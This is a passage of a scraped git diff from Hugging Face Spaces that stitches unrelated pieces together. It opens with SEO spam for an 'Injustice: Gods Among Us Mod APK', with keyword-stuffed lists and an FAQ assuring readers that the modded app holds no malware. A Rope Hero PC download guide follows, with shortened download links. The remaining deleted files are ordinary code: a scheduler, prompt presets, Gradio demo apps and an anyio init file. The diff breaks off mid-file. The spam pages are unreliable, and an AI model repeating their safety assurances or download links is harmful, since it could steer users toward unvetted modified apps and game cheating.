      Even though Injustice: Gods Among Us Mod APK gives you a lot of advantages and features, you still need some skills and strategies to master the game. Here are some tips and tricks that will help you improve your gameplay and have more fun:

      -

      Choose your team wisely

      -

      Injustice: Gods Among Us lets you create your own team of three characters for each battle. You can choose from a variety of heroes and villains, each with their own stats, skills, abilities, and special moves. However, not all characters are equal or compatible. You need to choose your team wisely based on their strengths, weaknesses, synergies, and matchups. For example, you might want to choose characters who have similar power types, such as energy, magic, or physical. This way, you can use their power moves more effectively and charge them faster. You might also want to choose characters who have complementary skills, such as healing, damage boost, stun, bleed, etc. This way, you can support each other and create powerful combos. And you might also want to choose characters who have an advantage over your opponents, such as class affinity, passive effects, or special moves. This way, you can deal more damage and take less damage in the battle.

      -

      Upgrade your characters and gear

      -

      Injustice: Gods Among Us allows you to upgrade your characters and gear to make them stronger and better. You can upgrade your characters by leveling them up with XP cards or by promoting them with character cards. You can also upgrade your gear by fusing them with gear shards or by evolving them with gear cards. Upgrading your characters and gear will increase their stats, skills, abilities, and special moves. It will also unlock new features and bonuses for them. For example, upgrading your characters will unlock new costumes and skins for them. And upgrading your gear will unlock new effects and modifiers for them. Upgrading your characters and gear is essential to keep up with the increasing difficulty of the game and to compete with other players online.

      -

      Complete challenges and missions

      -

      Injustice: Gods Among Us offers various challenges and missions that you can complete to earn more rewards and unlock more content in the game. You can complete daily challenges that give you coins, gems, XP cards, gear shards, etc. You can also complete weekly challenges that give you character cards, gear cards, etc. You can also complete story mode missions that give you stars, credits, etc. Completing challenges and missions will not only help you progress faster in the game but also make it more fun and interesting. You will be able to try different scenarios and objectives with different characters and gear. You will also be able to discover new aspects and secrets of the game's story and lore.

      -

      Play online and offline modes

      -

      Injustice: Gods Among Us has both online and offline modes that you can play depending on your preference and situation. You can play online mode if you have an internet connection and want to compete with other players around the world in ranked or unranked matches. You can also play offline mode if you don't have an internet connection or want to practice your skills or have fun with your friends in local multiplayer. Playing online mode will give you more rewards and rankings but also more challenges and risks. Playing offline mode will give you more freedom and flexibility but also less variety and excitement. You can switch between online and offline modes anytime you want and enjoy the game in different ways.

      -

      injustice gods among us mod apk unlimited money and energy
      -injustice gods among us mod apk all characters unlocked
      -injustice gods among us mod apk offline
      -injustice gods among us mod apk download for android
      -injustice gods among us mod apk rexdl
      -injustice gods among us mod apk revdl
      -injustice gods among us mod apk data
      -injustice gods among us mod apk obb
      -injustice gods among us mod apk hack
      -injustice gods among us mod apk free shopping
      -injustice gods among us mod apk no root
      -injustice gods among us mod apk 2023
      -injustice gods among us mod apk 3.5
      -injustice gods among us mod apk 2.21
      -injustice gods among us mod apk android 1
      -injustice gods among us mod apk unlimited coins and gems
      -injustice gods among us mod apk anti ban
      -injustice gods among us mod apk latest update
      -injustice gods among us mod apk highly compressed
      -injustice gods among us mod apk mega
      -injustice gods among us mod apk pure
      -injustice gods among us mod apk unlimited everything
      -injustice gods among us mod apk all cards unlocked
      -injustice gods among us mod apk andropalace
      -injustice gods among us mod apk blackmod
      -injustice gods among us mod apk cheat
      -injustice gods among us mod apk direct download link
      -injustice gods among us mod apk for ios
      -injustice gods among us mod apk full unlocked
      -injustice gods among us mod apk gamestechy
      -injustice gods among us mod apk happymod
      -injustice gods among us mod apk ihackedit
-injustice gods among us mod apk latest version 3.5 download for android offline with obb data file free shopping unlimited money and energy all characters unlocked anti ban hack cheat mega rexdl revdl pure blackmod andropalace gamestechy ihackedit happymod android 1 2023 no root highly compressed direct download link

      -

      Conclusion

      -

      Injustice: Gods Among Us is a fantastic game that combines DC comics and fighting games in a unique and thrilling way. You can play with your favorite heroes and villains, customize them with gear and abilities, and fight in various arenas inspired by iconic locations. You can also enjoy a captivating story mode that explores an alternate reality where Superman becomes a tyrant after losing Lois Lane. And with Injustice: Gods Among Us Mod APK, you can enjoy the game without any limitations or restrictions. You can get unlimited resources, all characters unlocked, god mode, one-hit kill, no ads, and more. You can download and install Injustice: Gods Among Us Mod APK easily and safely on your Android device and have fun without any worries. So what are you waiting for? Download Injustice: Gods Among Us Mod APK now and unleash your inner superhero or villain!

      -

      FAQs

      -

      Here are some frequently asked questions and answers about Injustice: Gods Among Us and Injustice: Gods Among Us Mod APK:

      -

      Q: Is Injustice: Gods Among Us free to play?

      -

      A: Yes, Injustice: Gods Among Us is free to play. However, it also has in-app purchases that allow you to buy coins, gems, and other items with real money. If you don't want to spend money on the game, you can use Injustice: Gods Among Us Mod APK, which gives you unlimited resources for free.

      -

      Q: Is Injustice: Gods Among Us Mod APK safe to use?

      -

      A: Yes, Injustice: Gods Among Us Mod APK is safe to use. It does not contain any viruses, malware, or spyware that might harm your device or your privacy. It also does not require root access or any cheats that might get you banned or harm your device. It works on any Android device without any issues.

      -

      Q: How do I update Injustice: Gods Among Us Mod APK?

      -

      A: To update Injustice: Gods Among Us Mod APK, you need to download the latest version of the mod from the same source where you downloaded the previous version. Then, you need to uninstall the old version of the mod and install the new version of the mod following the same steps as before. You don't need to worry about losing your progress or data as they will be saved automatically.

      -

      Q: Can I play Injustice: Gods Among Us Mod APK with my friends?

      -

      A: Yes, you can play Injustice: Gods Among Us Mod APK with your friends. You can either play online mode with them if they also have the mod installed on their devices or play offline mode with them using local multiplayer. Either way, you can have fun with your friends and show off your skills and characters.

      -

      Q: Can I request a feature or report a bug for Injustice: Gods Among Us Mod APK?

      -

      A: Yes, you can request a feature or report a bug for Injustice: Gods Among Us Mod APK. You can contact the developers of the mod through their website or social media accounts and let them know what you want or what you found. They will try their best to accommodate your requests and fix any issues as soon as possible.

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Rope Hero Vice Town - The Ultimate Crime Fighting Game for PC.md b/spaces/congsaPfin/Manga-OCR/logs/Rope Hero Vice Town - The Ultimate Crime Fighting Game for PC.md deleted file mode 100644 index fdec18758ea40ee3d43205c74741aef4ede92d6d..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Rope Hero Vice Town - The Ultimate Crime Fighting Game for PC.md +++ /dev/null @@ -1,97 +0,0 @@ -
      -

      Rope Hero Download for PC Windows 10: How to Play the Action Game on Your Computer

      -

      Introduction

      -

      If you are looking for a thrilling and adventurous action game, you might want to check out Rope Hero. This game lets you become a superhero who can swing around the city using a rope, fight criminals, and complete missions. You can also use various weapons, gadgets, and vehicles to enhance your gameplay.

      -

      rope hero download for pc windows 10


Download File https://urlca.com/2uOaPy



      -

      But what if you want to play Rope Hero on a bigger screen, with better graphics and controls? Well, you can do that by downloading and installing Rope Hero on your PC Windows 10. In this article, we will show you how to do that in two easy methods. Let's get started!

      -

      How to download and install Rope Hero on PC Windows 10

      -

      Method 1: Using BlueStacks emulator

      -

      One of the best ways to play Rope Hero on PC is by using an emulator. An emulator is a software that allows you to run Android apps and games on your computer. There are many emulators available, but we recommend BlueStacks, as it is one of the most popular and reliable ones. Here are the steps to use BlueStacks to play Rope Hero on PC:

      -

      Step 1: Download and install BlueStacks

      -

      First, you need to download and install BlueStacks on your PC. You can do that by visiting this link and following the instructions. The installation process is quite simple and straightforward.

      -

      Step 2: Launch BlueStacks and sign in to Google Play Store

      -

      Next, you need to launch BlueStacks and sign in to your Google account. This will allow you to access the Google Play Store, where you can find and download Rope Hero. If you don't have a Google account, you can create one for free.

      -

      Step 3: Search for Rope Hero and click install

      -

      Now, you need to search for Rope Hero in the search bar at the top right corner of the BlueStacks window. You will see a list of results, where you need to click on the icon of Rope Hero. This will take you to the game's page on the Google Play Store, where you need to click on the "Install" button.

      -

      Step 4: Enjoy playing Rope Hero on PC

      -

      Congratulations! You have successfully installed Rope Hero on your PC. You can now enjoy playing the game on a larger screen, with better graphics and controls. You can find the game icon on the home screen of BlueStacks, or in the "My Apps" tab. Just click on it and start swinging!

      -

      Method 2: Using APK/XAPK file

      -


      An alternative way to play Rope Hero on PC is by using an APK/XAPK file. An APK/XAPK file is a package file that contains all the data and resources needed to install an Android app or game. You can download an APK/XAPK file of Rope Hero from various sources online, such as APKdone or APKPure. Here are the steps to use an APK/XAPK file to play Rope Hero on PC:
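For the curious, an XAPK is commonly just a ZIP-style archive that bundles the APK together with its OBB data files. Assuming that holds for the file you downloaded, a short script can list what is inside it; the file name below is a placeholder.

```python
import zipfile

xapk_path = "rope_hero.xapk"  # placeholder name for the downloaded file

# An XAPK is typically a ZIP archive containing the APK plus OBB data files
with zipfile.ZipFile(xapk_path) as archive:
    for name in archive.namelist():
        print(name)
```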

      -

      Step 1: Download the APK/XAPK file of Rope Hero

      -

      First, you need to download the APK/XAPK file of Rope Hero from a trusted source. You can use your browser to search for the file, or use the links we provided above. Make sure you download the latest version of the game, and save it to a folder on your PC.

      -

      Step 2: Open the file with BlueStacks or another emulator

      -

      Next, you need to open the APK/XAPK file with an emulator. You can use BlueStacks, as we explained in method 1, or another emulator of your choice. To open the file with BlueStacks, you can either drag and drop it to the BlueStacks window, or right-click on it and choose "Open with BlueStacks". The emulator will automatically install the game for you.

      -

      How to install rope hero on windows 10
      -Rope hero vice town pc download free
      -Rope hero game for pc windows 10
      -Download rope hero emulator for pc
      -Rope hero action game for windows 10
      -Play rope hero on pc with bluestacks
      -Rope hero vice town for windows 10
      -Rope hero apk download for pc
      -Rope hero pc game download full version
      -Rope hero for windows 10 free download
      -Rope hero vice town on pc with noxplayer
      -Rope hero online game for pc
      -Download rope hero for pc windows 10/8/7
      -Rope hero vice town mod apk for pc
      -Rope hero 3d game for windows 10
      -Rope hero vice town cheats for pc
      -Rope hero offline game for pc
      -Rope hero vice town hack for pc
      -Rope hero simulator game for windows 10
      -Rope hero vice town update for pc
      -Rope hero vice town gameplay on pc
      -Rope hero vice town walkthrough for pc
      -Rope hero vice town tips and tricks for pc
      -Rope hero vice town review for pc
      -Rope hero vice town best weapons for pc
      -Rope hero vice town missions guide for pc
      -Rope hero vice town secrets and easter eggs for pc
      -Rope hero vice town new features for pc
      -Rope hero vice town latest version for pc
      -Rope hero vice town system requirements for pc
      -Rope hero vice town download size for pc
      -Rope hero vice town graphics settings for pc
      -Rope hero vice town controls and keyboard shortcuts for pc
      -Rope hero vice town bugs and fixes for pc
      -Rope hero vice town multiplayer mode for pc
      -Rope hero vice town custom skins for pc
      -Rope hero vice town achievements and rewards for pc
      -Rope hero vice town fun facts and trivia for pc
      -Rope hero vice town comparison with rope hero for pc
      -Rope hero vice town alternatives and similar games for pc

      -

      Step 3: Follow the instructions to install Rope Hero

      -

      Now, you need to follow the instructions on the screen to complete the installation process. Depending on the size of the file and your internet speed, this may take a few minutes. Once the installation is done, you will see a notification on the bottom right corner of the BlueStacks window.

      -

      Step 4: Have fun playing Rope Hero on PC

      -

      You are ready to play Rope Hero on PC! You can find the game icon on the home screen of BlueStacks, or in the "My Apps" tab. Just click on it and start your adventure!

      -

      Conclusion

      -

      In this article, we have shown you how to download and install Rope Hero on PC Windows 10. You can choose either method 1 or method 2, depending on your preference and convenience. Both methods are easy and effective, and will allow you to enjoy Rope Hero on a bigger screen, with better graphics and controls.

      -

      Rope Hero is a fun and exciting action game that lets you become a superhero who can swing around the city using a rope, fight criminals, and complete missions. You can also use various weapons, gadgets, and vehicles to enhance your gameplay. The game has many features that make it addictive and enjoyable, such as:

      -
        -
      • Indulge yourself in awesome in-game actions: You can perform amazing stunts and maneuvers with your rope, such as swinging, flying, climbing, jumping, and more. You can also use your rope to grab enemies and objects, and throw them around.
      • -
      • Free the city from crimes by becoming its hero: You can explore the open-world city and find various missions and challenges to complete. You can fight against gangs, robbers, terrorists, zombies, and other enemies. You can also save civilians and help them in different situations.
      • -
      • Make use of your superpowers and unlock new ones: You can use your superpowers to gain an edge in combat and movement. You can also unlock new powers as you progress in the game, such as super strength, speed, vision, healing, and more.
      • -
      • Various weapons with different powers: You can equip yourself with different weapons to suit your style and strategy. You can use guns, grenades, rockets, lasers, swords, hammers, and more. Each weapon has its own advantages and disadvantages.
      • -
      • Interesting vehicles to roam the city: You can drive or ride various vehicles to travel faster and easier around the city. You can use cars, bikes, helicopters, tanks, jets, and more. Each vehicle has its own features and abilities.
      • -
      • Many unique gadgets to work with: You can use different gadgets to enhance your gameplay and have more fun. You can use jetpacks, drones, magnets, parachutes, grappling hooks, and more. Each gadget has its own function and effect.
      • -
      • Freely discover the city in your own ways: You can roam around the city and find many secrets and surprises. You can interact with different objects and people. You can also customize your character's appearance and skills.
      • -
      • -

        As you can see, Rope Hero is a game that offers a lot of fun and excitement for anyone who loves action and adventure. If you want to experience the game on your PC Windows 10, you can follow the methods we have explained above. We hope you found this article helpful and informative. If you have any questions or feedback, please feel free to leave a comment below. Thank you for reading!

        -

        FAQs

        -

        Here are some frequently asked questions about Rope Hero and how to play it on PC Windows 10:

        -
          -
        1. Is Rope Hero free to play?
        2. -

Yes, Rope Hero is free to play on both Android and PC. However, the game may contain some in-app purchases that can enhance your gameplay, as well as ads that support the developers.

          -
        3. Is Rope Hero safe to download and install?
        4. -

          Yes, Rope Hero is safe to download and install, as long as you use a trusted source and an emulator. We recommend using the Google Play Store or the links we provided above to download the game, and BlueStacks or another emulator to install it on your PC.

          -
        5. Can I play Rope Hero offline?
        6. -

          Yes, you can play Rope Hero offline, as the game does not require an internet connection to run. However, some features and functions may not be available or updated when you play offline.

          -
        7. How can I update Rope Hero on PC?
        8. -

          You can update Rope Hero on PC by following the same steps as you would on your Android device. You can either use the Google Play Store or the APK/XAPK file to update the game. Make sure you have enough storage space and a stable internet connection before updating.

          -
        9. How can I contact the developers of Rope Hero?
        10. -

          You can contact the developers of Rope Hero by visiting their official website here, or by sending them an email at ropehero@naxeex.com. You can also follow them on their social media accounts, such as Facebook, Twitter, and YouTube.

          -

        401be4b1e0
        -
        -
        \ No newline at end of file diff --git a/spaces/contluForse/HuggingGPT/assets/Download Dedh Ishqiya Full Movie Kickass Torrent A Tale of Love Betrayal and Revenge.md b/spaces/contluForse/HuggingGPT/assets/Download Dedh Ishqiya Full Movie Kickass Torrent A Tale of Love Betrayal and Revenge.md deleted file mode 100644 index f57d8c3a22e54e8dbac905c5b48d65a1e7ad50d4..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Download Dedh Ishqiya Full Movie Kickass Torrent A Tale of Love Betrayal and Revenge.md +++ /dev/null @@ -1,6 +0,0 @@ -

        Download Dedh Ishqiya Full Movie Kickass Torrent


        DOWNLOAD === https://ssurll.com/2uzyrl



        - - aaccfb2cb3
        -
        -
        -

        diff --git a/spaces/contluForse/HuggingGPT/assets/Drag Me to Hell Full Movie in Hindi MP4 12 Dont Miss this Shocking and Suspenseful Film.md b/spaces/contluForse/HuggingGPT/assets/Drag Me to Hell Full Movie in Hindi MP4 12 Dont Miss this Shocking and Suspenseful Film.md deleted file mode 100644 index af8ecc627d12b8f56fca39b31ea8ecd609032e21..0000000000000000000000000000000000000000 --- a/spaces/contluForse/HuggingGPT/assets/Drag Me to Hell Full Movie in Hindi MP4 12 Dont Miss this Shocking and Suspenseful Film.md +++ /dev/null @@ -1,6 +0,0 @@ -

        dragmetohellfullmovieinhindimp412


        Download Zip > https://ssurll.com/2uzyvr



        -
        - aaccfb2cb3
        -
        -
        -

        diff --git a/spaces/coyotte508/static-light-dark/style.css b/spaces/coyotte508/static-light-dark/style.css deleted file mode 100644 index b8f5e546ec5f9f08161b97b675d7efec65ce6584..0000000000000000000000000000000000000000 --- a/spaces/coyotte508/static-light-dark/style.css +++ /dev/null @@ -1,41 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} - -@media (prefers-color-scheme: dark) { - body { - background: black; - color: gray; - } -} - -@media (prefers-color-scheme: light) { - body { - background: yellow; - } -} diff --git a/spaces/crashedice/signify/SOURCE/yolo_files/__init__.py b/spaces/crashedice/signify/SOURCE/yolo_files/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/cvlab/zero123-live/ldm/lr_scheduler.py b/spaces/cvlab/zero123-live/ldm/lr_scheduler.py deleted file mode 100644 index be39da9ca6dacc22bf3df9c7389bbb403a4a3ade..0000000000000000000000000000000000000000 --- a/spaces/cvlab/zero123-live/ldm/lr_scheduler.py +++ /dev/null @@ -1,98 +0,0 @@ -import numpy as np - - -class LambdaWarmUpCosineScheduler: - """ - note: use with a base_lr of 1.0 - """ - def __init__(self, warm_up_steps, lr_min, lr_max, lr_start, max_decay_steps, verbosity_interval=0): - self.lr_warm_up_steps = warm_up_steps - self.lr_start = lr_start - self.lr_min = lr_min - self.lr_max = lr_max - self.lr_max_decay_steps = max_decay_steps - self.last_lr = 0. - self.verbosity_interval = verbosity_interval - - def schedule(self, n, **kwargs): - if self.verbosity_interval > 0: - if n % self.verbosity_interval == 0: print(f"current step: {n}, recent lr-multiplier: {self.last_lr}") - if n < self.lr_warm_up_steps: - lr = (self.lr_max - self.lr_start) / self.lr_warm_up_steps * n + self.lr_start - self.last_lr = lr - return lr - else: - t = (n - self.lr_warm_up_steps) / (self.lr_max_decay_steps - self.lr_warm_up_steps) - t = min(t, 1.0) - lr = self.lr_min + 0.5 * (self.lr_max - self.lr_min) * ( - 1 + np.cos(t * np.pi)) - self.last_lr = lr - return lr - - def __call__(self, n, **kwargs): - return self.schedule(n,**kwargs) - - -class LambdaWarmUpCosineScheduler2: - """ - supports repeated iterations, configurable via lists - note: use with a base_lr of 1.0. - """ - def __init__(self, warm_up_steps, f_min, f_max, f_start, cycle_lengths, verbosity_interval=0): - assert len(warm_up_steps) == len(f_min) == len(f_max) == len(f_start) == len(cycle_lengths) - self.lr_warm_up_steps = warm_up_steps - self.f_start = f_start - self.f_min = f_min - self.f_max = f_max - self.cycle_lengths = cycle_lengths - self.cum_cycles = np.cumsum([0] + list(self.cycle_lengths)) - self.last_f = 0. 
- self.verbosity_interval = verbosity_interval - - def find_in_interval(self, n): - interval = 0 - for cl in self.cum_cycles[1:]: - if n <= cl: - return interval - interval += 1 - - def schedule(self, n, **kwargs): - cycle = self.find_in_interval(n) - n = n - self.cum_cycles[cycle] - if self.verbosity_interval > 0: - if n % self.verbosity_interval == 0: print(f"current step: {n}, recent lr-multiplier: {self.last_f}, " - f"current cycle {cycle}") - if n < self.lr_warm_up_steps[cycle]: - f = (self.f_max[cycle] - self.f_start[cycle]) / self.lr_warm_up_steps[cycle] * n + self.f_start[cycle] - self.last_f = f - return f - else: - t = (n - self.lr_warm_up_steps[cycle]) / (self.cycle_lengths[cycle] - self.lr_warm_up_steps[cycle]) - t = min(t, 1.0) - f = self.f_min[cycle] + 0.5 * (self.f_max[cycle] - self.f_min[cycle]) * ( - 1 + np.cos(t * np.pi)) - self.last_f = f - return f - - def __call__(self, n, **kwargs): - return self.schedule(n, **kwargs) - - -class LambdaLinearScheduler(LambdaWarmUpCosineScheduler2): - - def schedule(self, n, **kwargs): - cycle = self.find_in_interval(n) - n = n - self.cum_cycles[cycle] - if self.verbosity_interval > 0: - if n % self.verbosity_interval == 0: print(f"current step: {n}, recent lr-multiplier: {self.last_f}, " - f"current cycle {cycle}") - - if n < self.lr_warm_up_steps[cycle]: - f = (self.f_max[cycle] - self.f_start[cycle]) / self.lr_warm_up_steps[cycle] * n + self.f_start[cycle] - self.last_f = f - return f - else: - f = self.f_min[cycle] + (self.f_max[cycle] - self.f_min[cycle]) * (self.cycle_lengths[cycle] - n) / (self.cycle_lengths[cycle]) - self.last_f = f - return f - diff --git a/spaces/dakaiye/dky_xuexi/core_functional.py b/spaces/dakaiye/dky_xuexi/core_functional.py deleted file mode 100644 index e126b5733a26b2c06668755fc44763efe3d30bac..0000000000000000000000000000000000000000 --- a/spaces/dakaiye/dky_xuexi/core_functional.py +++ /dev/null @@ -1,78 +0,0 @@ -# 'primary' 颜色对应 theme.py 中的 primary_hue -# 'secondary' 颜色对应 theme.py 中的 neutral_hue -# 'stop' 颜色对应 theme.py 中的 color_er -# 默认按钮颜色是 secondary -from toolbox import clear_line_break - - -def get_core_functions(): - return { - "英语学术润色": { - # 前言 - "Prefix": r"Below is a paragraph from an academic paper. Polish the writing to meet the academic style, " + - r"improve the spelling, grammar, clarity, concision and overall readability. When necessary, rewrite the whole sentence. " + - r"Furthermore, list all modification and explain the reasons to do so in markdown table." + "\n\n", - # 后语 - "Suffix": r"", - "Color": r"secondary", # 按钮颜色 - }, - "中文学术润色": { - "Prefix": r"作为一名中文学术论文写作改进助理,你的任务是改进所提供文本的拼写、语法、清晰、简洁和整体可读性," + - r"同时分解长句,减少重复,并提供改进建议。请只提供文本的更正版本,避免包括解释。请编辑以下文本" + "\n\n", - "Suffix": r"", - }, - "查找语法错误": { - "Prefix": r"Can you help me ensure that the grammar and the spelling is correct? " + - r"Do not try to polish the text, if no mistake is found, tell me that this paragraph is good." + - r"If you find grammar or spelling mistakes, please list mistakes you find in a two-column markdown table, " + - r"put the original text the first column, " + - r"put the corrected text in the second column and highlight the key words you fixed.""\n" - r"Example:""\n" - r"Paragraph: How is you? Do you knows what is it?""\n" - r"| Original sentence | Corrected sentence |""\n" - r"| :--- | :--- |""\n" - r"| How **is** you? | How **are** you? |""\n" - r"| Do you **knows** what **is** **it**? | Do you **know** what **it** **is** ? |""\n" - r"Below is a paragraph from an academic paper. 
" - r"You need to report all grammar and spelling mistakes as the example before." - + "\n\n", - "Suffix": r"", - "PreProcess": clear_line_break, # 预处理:清除换行符 - }, - "中译英": { - "Prefix": r"Please translate following sentence to English:" + "\n\n", - "Suffix": r"", - }, - "学术中英互译": { - "Prefix": r"I want you to act as a scientific English-Chinese translator, " + - r"I will provide you with some paragraphs in one language " + - r"and your task is to accurately and academically translate the paragraphs only into the other language. " + - r"Do not repeat the original provided paragraphs after translation. " + - r"You should use artificial intelligence tools, " + - r"such as natural language processing, and rhetorical knowledge " + - r"and experience about effective writing techniques to reply. " + - r"I'll give you my paragraphs as follows, tell me what language it is written in, and then translate:" + "\n\n", - "Suffix": "", - "Color": "secondary", - }, - "英译中": { - "Prefix": r"翻译成地道的中文:" + "\n\n", - "Suffix": r"", - }, - "找图片": { - "Prefix": r"我需要你找一张网络图片。使用Unsplash API(https://source.unsplash.com/960x640/?<英语关键词>)获取图片URL," + - r"然后请使用Markdown格式封装,并且不要有反斜线,不要用代码块。现在,请按以下描述给我发送图片:" + "\n\n", - "Suffix": r"", - }, - "解释代码": { - "Prefix": r"请解释以下代码:" + "\n```\n", - "Suffix": "\n```\n", - }, - "参考文献转Bib": { - "Prefix": r"Here are some bibliography items, please transform them into bibtex style." + - r"Note that, reference styles maybe more than one kind, you should transform each item correctly." + - r"Items need to be transformed:", - "Suffix": r"", - "Visible": False, - } - } diff --git a/spaces/dashues/frieda/app.py b/spaces/dashues/frieda/app.py deleted file mode 100644 index 179177015b8fb47a3a0e85922c8fa9d9e5615a83..0000000000000000000000000000000000000000 --- a/spaces/dashues/frieda/app.py +++ /dev/null @@ -1,22 +0,0 @@ -import gradio as gr -from fastai.vision.all import * -import skimage - - -def label_func(s: str): return " ".join(s.split("_")[:-1]) - -learn = load_learner('frieda_and_pet_classifier.pkl') - -labels = learn.dls.vocab -def predict(img): - img = PILImage.create(img) - pred,pred_idx,probs = learn.predict(img) - return {labels[i]: float(probs[i]) for i in range(len(labels))} - -title = "Frieda and other pet breeds classifier" -description = "A classifier that can predict pet breeds including the most unique breed *Frieda* with the rarity of one. It is trained on the Oxford Pets dataset, augmented by images of Frieda the dog, with fastai. Credits to Jeremhy Howard and his awesome fastai course as well as Gradio and HuggingFace." 
-examples = ['frieda.jpg', 'cat.jpg'] -interpretation='default' -enable_queue=True - -gr.Interface(fn=predict,inputs=gr.inputs.Image(shape=(512, 512)),outputs=gr.outputs.Label(num_top_classes=3),title=title,description=description,examples=examples,interpretation=interpretation,enable_queue=enable_queue).launch() diff --git a/spaces/davidscripka/openWakeWord/app.py b/spaces/davidscripka/openWakeWord/app.py deleted file mode 100644 index e7f57cf8f65269ff8f0d39f4d98bb37f9d48b5df..0000000000000000000000000000000000000000 --- a/spaces/davidscripka/openWakeWord/app.py +++ /dev/null @@ -1,97 +0,0 @@ -import gradio as gr -import json -import pandas as pd -import collections -import scipy.signal -import numpy as np -from functools import partial -from openwakeword.model import Model - -# Load openWakeWord models -model = Model(inference_framework="onnx") - -# Define function to process audio -def process_audio(audio, state=collections.defaultdict(partial(collections.deque, maxlen=60))): - # Resample audio to 16khz if needed - if audio[0] != 16000: - data = scipy.signal.resample(audio[1], int(float(audio[1].shape[0])/audio[0]*16000)) - - # Get predictions - for i in range(0, data.shape[0], 1280): - if len(data.shape) == 2 or data.shape[-1] == 2: - chunk = data[i:i+1280][:, 0] # just get one channel of audio - else: - chunk = data[i:i+1280] - - if chunk.shape[0] == 1280: - prediction = model.predict(chunk) - for key in prediction: - #Fill deque with zeros if it's empty - if len(state[key]) == 0: - state[key].extend(np.zeros(60)) - - # Add prediction - state[key].append(prediction[key]) - - # Make line plot - dfs = [] - for key in state.keys(): - df = pd.DataFrame({"x": np.arange(len(state[key])), "y": state[key], "Model": key}) - dfs.append(df) - - df = pd.concat(dfs) - plot = gr.LinePlot().update(value = df, x='x', y='y', color="Model", y_lim = (0,1), tooltip="Model", - width=600, height=300, x_title="Time (frames)", y_title="Model Score", color_legend_position="bottom") - - # Manually adjust how the legend is displayed - tmp = json.loads(plot["value"]["plot"]) - tmp["layer"][0]['encoding']['color']['legend']["direction"] = "vertical" - tmp["layer"][0]['encoding']['color']['legend']["columns"] = 4 - tmp["layer"][0]['encoding']['color']['legend']["labelFontSize"] = 12 - tmp["layer"][0]['encoding']['color']['legend']["titleFontSize"] = 14 - - plot["value"]['plot'] = json.dumps(tmp) - - return plot, state - -# Create Gradio interface and launch - -desc = """ -This is a demo of the pre-trained models included in the latest release -of the [openWakeWord](https://github.com/dscripka/openWakeWord) library. - -Click on the "record from microphone" button below to start capturing. -The real-time scores from each model will be shown in the line plot. Hover over -each line to see the name of the corresponding model. - -Different models will respond to different wake words/phrases (see [the model docs](https://github.com/dscripka/openWakeWord/tree/main/docs/models) for more details). -If everything is working properly, -you should see a spike in the score for a given model after speaking a related word/phrase. Below are some suggested phrases to try! 
- -| Model Name | Word/Phrase | -| --- | --- | -| alexa | "alexa" | -| hey_mycroft | "hey mycroft"| -| hey_jarvis | "hey jarvis"| -| hey_rhasspy | "hey rhasspy"| -| weather | "what's the weather", "tell me today's weather" | -| x_minute_timer | "set a timer for 1 minute", "create 1 hour alarm" | - -""" - -gr_int = gr.Interface( - title = "openWakeWord Live Demo", - description = desc, - css = ".flex {flex-direction: column} .gr-panel {width: 100%}", - fn=process_audio, - inputs=[ - gr.Audio(source="microphone", type="numpy", streaming=True, show_label=False), - "state" - ], - outputs=[ - gr.LinePlot(show_label=False), - "state" - ], - live=True) - -gr_int.launch() \ No newline at end of file diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/anyio/abc/__init__.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/anyio/abc/__init__.py deleted file mode 100644 index 72c34e544e1634e4f42c005506bac9b61ab095f5..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/anyio/abc/__init__.py +++ /dev/null @@ -1,90 +0,0 @@ -from __future__ import annotations - -__all__ = ( - "AsyncResource", - "IPAddressType", - "IPSockAddrType", - "SocketAttribute", - "SocketStream", - "SocketListener", - "UDPSocket", - "UNIXSocketStream", - "UDPPacketType", - "ConnectedUDPSocket", - "UnreliableObjectReceiveStream", - "UnreliableObjectSendStream", - "UnreliableObjectStream", - "ObjectReceiveStream", - "ObjectSendStream", - "ObjectStream", - "ByteReceiveStream", - "ByteSendStream", - "ByteStream", - "AnyUnreliableByteReceiveStream", - "AnyUnreliableByteSendStream", - "AnyUnreliableByteStream", - "AnyByteReceiveStream", - "AnyByteSendStream", - "AnyByteStream", - "Listener", - "Process", - "Event", - "Condition", - "Lock", - "Semaphore", - "CapacityLimiter", - "CancelScope", - "TaskGroup", - "TaskStatus", - "TestRunner", - "BlockingPortal", -) - -from typing import Any - -from ._resources import AsyncResource -from ._sockets import ( - ConnectedUDPSocket, - IPAddressType, - IPSockAddrType, - SocketAttribute, - SocketListener, - SocketStream, - UDPPacketType, - UDPSocket, - UNIXSocketStream, -) -from ._streams import ( - AnyByteReceiveStream, - AnyByteSendStream, - AnyByteStream, - AnyUnreliableByteReceiveStream, - AnyUnreliableByteSendStream, - AnyUnreliableByteStream, - ByteReceiveStream, - ByteSendStream, - ByteStream, - Listener, - ObjectReceiveStream, - ObjectSendStream, - ObjectStream, - UnreliableObjectReceiveStream, - UnreliableObjectSendStream, - UnreliableObjectStream, -) -from ._subprocesses import Process -from ._tasks import TaskGroup, TaskStatus -from ._testing import TestRunner - -# Re-exported here, for backwards compatibility -# isort: off -from .._core._synchronization import CapacityLimiter, Condition, Event, Lock, Semaphore -from .._core._tasks import CancelScope -from ..from_thread import BlockingPortal - -# Re-export imports so they look like they live directly in this package -key: str -value: Any -for key, value in list(locals().items()): - if getattr(value, "__module__", "").startswith("anyio.abc."): - value.__module__ = __name__ diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/components/carousel.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/components/carousel.py deleted file mode 100644 index 